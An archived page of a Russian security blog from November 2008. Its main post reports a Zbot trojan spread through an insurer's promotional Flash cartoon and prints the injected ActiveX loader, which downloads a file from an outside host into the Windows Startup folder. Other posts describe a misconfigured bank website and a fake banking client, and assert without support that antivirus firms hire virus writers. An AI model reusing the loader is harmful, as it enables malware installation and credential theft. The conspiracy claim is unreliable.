Архив Ноябрь, 2008

Рекламный эротический ролик Альфастрахования заражал пользователей трояном

Posted in Прочее with tags on Ноябрь 28, 2008 by isns

Во время кампании по увеличению трафика, главная страница сайта компании «Альфастрахование» заражала посетителей трояном через эротико-рекламный мультфильм.

Акция по привлечению посетителей на сайт «Альфастрахования» была запущена 25 ноября.  На главной странице сайта была установлена закладка — при многократном (5-8 раз) нажатии на номер телефона компании запускался swf-мультфильм эротического содержания, сопровожденный призывом воспользоваться страховыми услугами компании.

Информация об этом распространялась по Сети методом вирусного маркетинга. По данным Rambler Top100 за вчерашний день главную страницу сайта посетили 142 480 раз, что сопоставимо с недельной нормой посещаемости ресурса.

Вскоре после старта рекламной кампании обнаружилось, что в код ролика внедрена троянская программа Trojan-Spy.Win32.Zbot.gkj. По информации «Лаборатории Касперского», она была внесена в антивирусную базу 16 ноября 2008 г., и антивирусные продукты компании ее детектировали, не рекомендуя сайт к посещению. Учитывая «аккуратность» расположения трояна во flash-коде, в «Касперском» не исключают, что вредоносная программа была подсажена на сайт вручную. Вирус грузился внутри ролика следующим образом:

<pre>
HTTP/1.1 200 OK
Date: Tue, 25 Nov 2008 15:43 GMT
Server: Apache/2.2.3 (CentOS)
X-Powered-By: PHP/5.1.6
Vary: Accept-Encoding,User-Agent
Content-Length: 475
Connection: close
Content-Type: text/html
<object classid=«clsid:F0E42D50-368C-11D0-AD81-00A0C90DC8D9» id=«attack»></object>
<script>
var arbitrary_file = «google-analyze.com/tracker/load.php»;
var destination = ‘c:/Documents and Settings/All Users/Start Menu/Programs/StartUp/browsser.exe’;
attack.SnapshotPath = arbitrary_file;
attack.CompressedPath = destination;
attack.PrintSnapshot(arbitrary_file,destination);
</script>
<embed src=«pdf.php» type=«application/pdf» width=100 height=100></embed>
</pre>
В «Лаборатории Касперского» не располагают информацией о функциональности этого трояна, но семейству Zbot, к которому он относится, свойственно, после инсталляции себя в систему, воровать пользовательские пароли, перехватывать данные, вводимые в формы браузеров и контролировать адреса банков и платежных систем. Таким образом происходит кража аккаунтов. Трояны Zbot способны перехватывать нажатие кнопки мыши и делаеть в этот момент скриншот экрана.

Интересно, что, хотя по информации «Лаборатории Касперского», ИТ-департамент «Альфастрахования» был извещен о проблеме с главной страницей вечером 25 ноября, днем 26-го flash-ролик еще запускался, и антивирусные программы детектировали в нем троян.

Вирмейкеры работаеют на антивирусные компании

Posted in Софт with tags on Ноябрь 24, 2008 by isns

Многие антивируные комании нанимают вирмейкеров для того, чтобы те разрабатывали вирусы-черви которые бы распространялись по интернете. Для того чтобы добавлять их в свою базу. Тем заявить о себе, что мы можем выдечить Вас от этого вируса, а другие антивирусные продукты нет.

Ничего вам этого не напоминает ? =)

Официальный сайт банка Мазамбика

Posted in Прочее with tags on Ноябрь 18, 2008 by isns

Недавно проводился тест сайта банка Мозамбика. Было выявлено множество ошибок. Apache который был установлен на сервере как сервер http дает периодически ошибки и открывает не Интернет страничку, а дает возможность просмотреть каталоги файлов которые находятся на сервере.  Тем самым злоумышленник может скачивать файлы с директорий которые были закрыты для просмотра. Также на сайте есть папка “upload” в которую можно закачивать файлы на сайт.

Клиенты банка Бразилии под угрозой.

Posted in AntiHack with tags on Ноябрь 18, 2008 by isns

Наверное уже не для кого не секрет, что сейчас есть достаточное количество вариантов по взлому корпоративных сетей. Даже банковские сети оказались не настолько защищенными как могло бы показаться нам. Сегодня один мой старый знакомый на мой электронный ящик отправил программу, которая полностью копирует клиент банка Бразилии. Но в отличии от настоящего клиента, фальшивый клиент отправляет данных не в банк для входа в систему, а мошеннику на электронный адрес.  

bank_brasil

Как видно на картинке, эта программа полность эммитирует работу WEB браузера.

Начало рубрики в новом блоге.

Posted in Прочее with tags on Ноябрь 18, 2008 by isns

Приветствую Вас. Мы переехали на новый блог. Тут я буду писать всё самое важное в мире IT security.